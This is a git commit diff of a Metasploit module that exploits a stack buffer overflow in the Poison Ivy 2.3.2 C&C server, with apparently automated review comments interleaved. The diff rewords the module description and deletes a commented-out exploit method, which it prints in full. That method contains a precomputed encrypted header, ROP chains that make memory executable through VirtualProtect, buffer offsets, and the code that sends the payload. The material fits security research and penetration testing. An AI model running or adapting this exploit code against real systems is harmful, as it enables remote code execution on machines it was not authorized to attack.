poisonivy_bof description updated

unstable
jvazquez-r7 2012-07-05 00:18:13 +02:00
parent 8bdf3b56f5
commit ff4a0bc3aa
1 changed files with 12 additions and 77 deletions


@ -18,22 +18,25 @@ class Metasploit3 < Msf::Exploit::Remote
'Name' => "Poison Ivy 2.3.2 C&C Server Buffer Overflow", 'Name' => "Poison Ivy 2.3.2 C&C Server Buffer Overflow",
'Description' => %q{ 'Description' => %q{
This module exploits a stack buffer overflow in Poison Ivy 2.3.2 C&C server. This module exploits a stack buffer overflow in Poison Ivy 2.3.2 C&C server.
The exploit does not need to know the password chosen for the bot/server comm. The exploit does not need to know the password chosen for the bot/server
If the C&C is configured with the default 'admin' password the exploit should communication. If the C&C is configured with the default 'admin' password,
work fine. In case of the C&C configured with another password the exploit can the exploit should work fine. In case of the C&C configured with another
fail. password the exploit can fail. The 'check' command can be used to determine
if the C&C target is using the default 'admin' password.
Hopefully an exploit try won't crash the Poison Ivy C&C process, just the thread Hopefully an exploit try won't crash the Poison Ivy C&C process, just the thread
responsible of handling the connection. Because of this the module provides a responsible of handling the connection. Because of this the module provides the
Bruteforce target. When selected a random header will be sent in case the default RANDHEADER option and a bruteforce target. If RANDHEADER is used a random header
for the password 'admin' doesn't work. Bruteforce will stop after 5 tries or a will be used. If the bruteforce target is selected, a random header will be sent in
session obtained. case the default for the password 'admin' doesn't work. Bruteforce will stop after
5 tries or a session obtained.
}, },
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => 'Author' =>
[ [
'Andrzej Dereszowski', # Vulnerability Discovery 'Andrzej Dereszowski', # Vulnerability Discovery
'Gal Badishi' # Exploit and Metasploit module 'Gal Badishi', # Exploit and Metasploit module
'juan vazquez' # Testing and little of Metasploit-fu
], ],
'References' => 'References' =>
[ [
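Review bot: The reworded description promises a `check` command and a `RANDHEADER` option, but nothing in this hunk adds either; the diff touches only the description string and the author list, so confirm the module actually registers `RANDHEADER` in its options and implements `check` before merging, otherwise the text documents features the module does not have. Two wording nits in the same paragraph: "responsible of handling the connection" should read "responsible for handling the connection", and "Bruteforce will stop after 5 tries or a session obtained" should read "... or a session is obtained". It would also help to state what RANDHEADER sends in place of the default 'admin'-encrypted header, since "a random header will be used" leaves the reader guessing what is randomized.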
@ -176,72 +179,4 @@ end
(1) Poison Ivy fails to run on DEP enabled systems (maybe due to the unpacking process) (1) Poison Ivy fails to run on DEP enabled systems (maybe due to the unpacking process)
(2) When trying a unpacked version on DEP enabled systems windows/exec payload runs, but not meterpreter (2) When trying a unpacked version on DEP enabled systems windows/exec payload runs, but not meterpreter
def exploit
# This is the 32-byte header we want to send, encrypted with the default password ("admin")
# We have a very good chance of succeeding even if the password was changed
header = "\xe7\x77\x44\x30\x9a\xe8\x4b\x79\xa6\x3f\x11\xcd\x58\xab\x0c\xdf\x2a\xcc\xea\x77\x6f\x8c\x27\x50\xda\x30\x76\x00\x5d\x15\xde\xb7"
short_rop = [
0x0041F1E9, # 1st jump - will put esp (8 bytes from here) into ecx: push esp # and al,4 # pop ecx # pop edx # retn
0x00401000, # Readable/writeable - will be cleaned by original ret 4 (esp will point to the next dword)
0xFFFF8000, # edx. We'll add this number later to ebp (which will subtract 0x8000 from it).
0x0042F63A, # Will put esp into ebp: push esp # pop ebp # pop edi # pop esi # pop ebx # retn
0x00000000, # edi (ebp points here now)
0x00000000, # esi
0x00000000, # ebx
0x00426799, # We need this to offset ebp: mov eax,edx # retn
0x0041F337, # Subtract 0x8000 from ebp: add ebp,eax # retn
0x00403A77, # mov esp,ebp # pop ebp # retn
].pack("V*")
long_rop = [
0x00000000, # New ebp
0x0041F1E9, # Will put esp (8 bytes from here) into ecx: push esp # and al,4 # pop ecx # pop edx # retn
0x0000002C, # edx. We'll add this number later to ebp, to prevent looping.
0x0042F63A, # Will put esp into ebp: push esp # pop ebp # pop edi # pop esi # pop ebx # retn
0x00000001, # edi. We need it when we call VirtualProtect (ebp points here now)
0x00000000, # esi
0x00000000, # ebx
0x00426799, # We need this to offset ebp: mov eax,edx # retn
0x0041F337, # Subtract 0x8000 from ebp: add ebp,eax # retn
0x004D82DE, # eax will now point 8 bytes from the beginning of the bigger ROP chain: mov eax,ecx # retn
0x004F196E, # push eax (address) and call VirtualProtect, then add ebx, 0x28 # mov edi, 0x46FAC1 # pop esi # pop ebx # mov esp, ebp # pop ebp # ret 8
0x00004000, # Size
0x00000040, # New protect (0x40 = PAGE_EXECUTE_READWRITE)
0x00401000, # Old protect (ptr)
0x00000000, # esi
0x00000000, # ebx. ebp will point here after the offset, meaning that esp will point here after VirtualProtect.
0x0041AA97, # jmp esp (also new ebp)
0x00000000, # Discarded
0x00000000, # Discarded
].pack("V*")
short_rop_pos = 0x806D
long_rop_pos = short_rop_pos - 0x7FF0
# Handshake
connect
print_status("Performing handshake...")
sock.put("\x00" * 256)
sock.get
# Don't change the nulls, or it might not work
xploit = ''
xploit << header
xploit << "\x00" * (long_rop_pos - xploit.length)
xploit << long_rop
xploit << payload.encoded
xploit << "\x00" * (short_rop_pos - xploit.length)
xploit << short_rop
# The disconnection triggers the exploit
print_status("Sending exploit...")
sock.put(xploit)
select(nil,nil,nil,5)
disconnect
# Time to own the box
handler
end
=end =end
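Review bot: Deleting the commented-out `exploit` method is right, but it removes the only explanation of the layout constants (`short_rop_pos = 0x806D`, `long_rop_pos = short_rop_pos - 0x7FF0`), of the 256 null-byte handshake, and of the `select(nil,nil,nil,5)` / `disconnect` step annotated "The disconnection triggers the exploit"; if the live `exploit` method reuses those values, carry the comments over so the offsets do not become magic numbers. The two DEP observations, (1) and (2), stay behind inside the `=begin`/`=end` block whose `=end` closes this hunk; since they describe a real limitation (only `windows/exec` working on the unpacked build under DEP), they belong in the module's documented notes rather than in a comment block at the end of the file.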